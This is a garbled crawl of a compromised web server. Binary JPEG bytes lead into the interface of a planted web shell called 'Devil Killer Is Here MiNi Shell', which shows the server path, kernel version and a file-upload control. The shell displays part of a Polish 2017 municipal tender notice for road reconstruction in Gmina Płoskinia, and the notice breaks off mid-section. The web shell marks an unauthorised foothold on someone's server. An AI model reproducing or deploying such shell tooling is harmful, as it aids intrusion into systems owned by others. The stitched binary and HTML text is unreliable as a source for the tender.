JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170424/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170424/71803-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://ploskinia-ug.bip-wm.pl' target='_blank'>http://ploskinia-ug.bip-wm.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 71803 - 2017
              z dnia 2017-04-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Płoskinia: Modernizacja infrastruktury drogowej na terenie Gminy Płoskinia
Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy	
Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel   
           Działka nr 242
Część III - Przebudowa drogi wewnętrznej w miejscowości Chruściel 
           Działka nr 267/7
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina  Płoskinia, krajowy numer identyfikacyjny
              54600600000, ul.
              Płoskinia 
              8,
              14526  
              Płoskinia, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              556 208 600, e-mail
              ugploskinia@braniewo.net.pl, faks
              0-55 620 8602.
              <br />
              Adres strony internetowej (URL): http://ploskinia-ug.bip-wm.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://ploskinia-ug.bip-wm.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://ploskinia-ug.bip-wm.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />W formie pisemnej, za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście, za pośrednictwem posłańca <br />
                Adres:
                <br />Urząd Gminy Płoskinia, Płoskinia 8, 14-526 Płoskinia</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Modernizacja infrastruktury drogowej na terenie Gminy Płoskinia
Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy	
Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel   
           Działka nr 242
Część III - Przebudowa drogi wewnętrznej w miejscowości Chruściel 
           Działka nr 267/7
<br /><b>Numer referencyjny: </b>SO-I. 271.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Modernizacja infrastruktury drogowej na terenie Gminy Płoskinia składająca się z trzech części;
Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy.	
Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel  Działka nr 242.
Część III - Przebudowa drogi wewnętrznej w miejscowości Chruściel 
                 Działka nr 267/7.
OPIS PRZEDMIOTU ZAMÓWIENIA ZAWARTY JEST W INFORMACJACH DOTYCZĄCYCH OFERT CZĘŚCIOWYCH.
Opis wspólny dla każdej części:
1. Informacje dodatkowe dotyczące przedmiotu zamówienia
1)Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji robót. 
2)Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową. 
3)Wykonawca uwzględnia również likwidację placu budowy, oraz wszelkie inne prace nie objęte w SIWZ, a konieczne do   wykonania ze względu na sztukę budowlaną.
4)Oznakowanie robót w czasie ich prowadzenia Wykonawca zabezpiecza we własnym zakresie. 
5)Wykonawca zobowiązany jest do utrzymania w czystości dróg publicznych, po których będzie odbywał się ruch pojazdów budowy i transportujących materiały. W przypadku ewentualnych roszczeń odszkodowawczych administratorów i zarządców za zniszczenie dróg i ulic przez transport budowy Wykonawca jest zobowiązany do ich naprawy na własny koszt, który nie będzie podlegał odrębnej zapłacie i jest wliczony w cenę kontraktową. 
6)Wykonawca zobowiązany jest zapewnić kierowanie robotami objętymi Umową, tak długo jak będzie to konieczne, przez osobę posiadającą kwalifikacje oraz spełniającą wymagania określone w ustawie Prawo Budowlane. 
7)Wykonawca zobowiązany jest do zapewnienia obsługi geodezyjnej podczas prowadzenia robót i sporządzenia powykonawczej inwentaryzacji geodezyjnej. Wykonawca zobowiązany jest do dostarczenia Zamawiającemu elektronicznej wersji powykonawczej inwentaryzacji geodezyjnej. 
8)Zgodnie z art. 30 ust. 4 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego roboty spełniają wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy). Za rozwiązania równoważne uznana będzie oferta na wykonanie robót przy wykorzystaniu technologii, materiałów i sprzętu innego niż określone w SST, dokumentacji projektowej, przedmiarze, kosztorysie ofertowym itp. pod warunkiem, że ich parametry będą nie gorsze niż określone w powyższych dokumentach. Jeżeli rozwiązania równoważne będą naruszały wymogi ustawy Prawo budowlane, inne przepisy lub zasady wiedzy technicznej, spowoduje to uznanie ich za nierównoważne i odrzucenie oferty Wykonawcy na podstawie art. 89 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych. Ilekroć w dokumentacji projektowej podane są typy urządzeń lub wyrobów oraz ich producenci, należy traktować je, jako przykładowe. Do realizacji robót mogą być stosowane urządzenia lub wyroby równoważne o minimalnych parametrach technicznych jak wskazane w dokumentacji. Gdy zaoferowane rozwiązania równoważne będą powodowały konieczność zmiany dokumentacji projektowej, Wykonawca, którego oferta będzie wybrana jako najkorzystniejsza, zobowiązany będzie do dokonania  przed rozpoczęciem wykonania przedmiotu zamówienia  zmiany tej dokumentacji oraz zostanie obciążony kosztami tych zmian. 
2. Zatrudnienie osób na umowę o pracę;
1)Zgodnie z art. 29 ust. 3a ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974r.  Kodeks pracy (t.j. Dz. U. z 2016r., poz. 1666, z późn. zm.). Wymóg ten dotyczy osób, które wykonywać będą bezpośrednio czynności związane z wykonywaniem robót.
2)Zamawiający ma prawo w każdym momencie realizacji zamówienia do kontroli sposobu wykonywania przez Wykonawcę zamówienia wymogu, o którym mowa powyżej. W ramach uprawnień kontrolnych zamawiający ma prawo:
a)	żądać od Wykonawca przedłożenia w wyznaczonym terminie Zamawiającemu oświadczenie Wykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności,
b)żądać od Wykonawcy złożenia wyjaśnień na piśmie w sprawach dotyczących zatrudniania pracowników wykonujących czynności w zakresie wykonywania usługi,
c)przyjmować od osób wykonujących czynności w zakresie wykonywania usługi oświadczeń odnośnie faktu i podstaw ich zatrudnienia, 
d)wezwać Wykonawcę do przedłożenia Zamawiającemu w wyznaczonym terminie kopię umowy/umów, która powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia               29 sierpnia 1997 roku o ochronie danych osobowych (t. j. Dz. U. z 2016r., poz. 922),
e)wezwać Wykonawcę do przedłożenia Zamawiającemu w wyznaczonym terminie zaświadczenia właściwego oddziału ZUS, potwierdzającego opłacanie przez wykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy, która powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (t. j. Dz. U. z 2016r., poz. 922),
f)wezwać Wykonawcę do przedłożenia Zamawiającemu w wyznaczonym terminie Zamawiającemu poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (t. j. Dz. U. z 2016r., poz. 922).
3)Sankcje z tytułu niespełnienia wymagań w zakresie zatrudnienia; Wykonawca na żądanie Zamawiającego musi przedłożyć Zamawiającemu dokument, oświadczenie potwierdzające zatrudnienie przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności wskazanych przez Zamawiającego przy realizacji przedmiotowego zamówienia. Za niespełnienie przez Wykonawcę lub podwykonawcę przedmiotowych wymagań Zamawiający naliczy niżej podane kary umowne:
a)500,00 zł za każdą osobę, która wykonuje czynności przy realizacji przedmiotowego zamówienia, a nie jest zatrudniona na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę,
b)500,00 zł za każdy dzień opóźnienia w przedstawieniu Zamawiającemu na żądanie w wyznaczonym terminie dokumentu, oświadczenia wykazanych w punkcie 2 potwierdzających zatrudnienie przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wskazanych przez Zamawiającego.


<br /><br /><b>II.5) Główny kod CPV: </b>45233220-7<br /><b> Dodatkowe kody CPV:</b>45233222-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/08/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 29/08/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 28/08/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>DATA ZAKOŃCZENIA DOTYCZY POSZCZEGÓLNYCH CZĘŚCI.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek udziału w postępowaniu  jeżeli wykaże że: będzie posiadać wiedzę i doświadczenie zawodowe umożliwiające wykonanie przedmiotu zamówienia tj., 
a)Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie roboty budowlanej obejmującej swoim zakresem budowę, przebudowę lub remont (w rozumieniu ustawy z dnia 7 lipca 1994 r. "Prawo budowlane" (t. j. Dz. U. z 2016r. poz. 290) drogi o nawierzchni z betonu asfaltowego (wraz z robotami towarzyszącymi; odwodnienie, chodniki, pobocza itp.) i udokumentowanie, że robota ta została wykonana w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona:
dla;
Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy
	- minimum jednej roboty o wartości co najmniej 250 000,00 zł (brutto),
dla;
Część II -Przebudowa drogi wewnętrznej w miejscowości ChruścielDziałka nr 242
- minimum jednej roboty o wartości co najmniej 180 000,00 zł (brutto),
dla;
Część III-Przebudowa drogi wewnętrznej w miejscowości Chruściel-Działka nr 
          267/7
- minimum jednej roboty o wartości co najmniej 250 000,00 zł (brutto),
b)Kierownik budowy (dla części I, II, III): wymagana liczba osób  min. jedna osoba pełniąc funkcję kierownika robót budowlanych; kwalifikacje zawodowe  uprawnienia budowlane bez ograniczeń w specjalności drogowej

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Ocena spełnienia warunków udziału w postępowaniu oraz podstaw wykluczenia Wykonawcy z postępowania będzie dokonywana na zasadzie spełnia/nie spełnia, w oparciu o złożone przez Wykonawców oświadczenia i dokumenty opisane w rozdziale VIII.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy, 2. 2. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa zamiast dokumentów wymienionych w rozdz. VIII 4 pkt 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty  budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów inne dokumenty-załącznik Nr 5 do SIWZ; 
- roboty budowlanej obejmującej swoim zakresem budowę, przebudowę lub remont drogi (w rozumieniu ustawy z dnia 7 lipca 1994 r. "Prawo budowlane" (t. j. Dz. U. z 2016r. poz. 290) drogi o nawierzchni z betonu asfaltowego (wraz z robotami towarzyszącymi; odwodnienie, chodniki, pobocza itp.) o wartości co najmniej;  
dla
Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy
- minimum jednej roboty o wartości co najmniej 250 000,00 zł (brutto).
dla
Część II -Przebudowa drogi wewnętrznej w miejscowości ChruścielDziałka nr 242
- minimum jednej roboty o wartości co najmniej 180 000,00 zł (brutto).
dla
Część III-Przebudowa drogi wewnętrznej w miejscowości Chruściel-Działka nr 267/7
- minimum jednej roboty o wartości co najmniej 250 000,00 zł (brutto).
2)Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  załącznik nr 6 do SIWZ;
 - minimum jedną osoba kierownik budowy posiadający uprawnienia budowlane   
    bez ograniczeń w specjalności drogowej 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
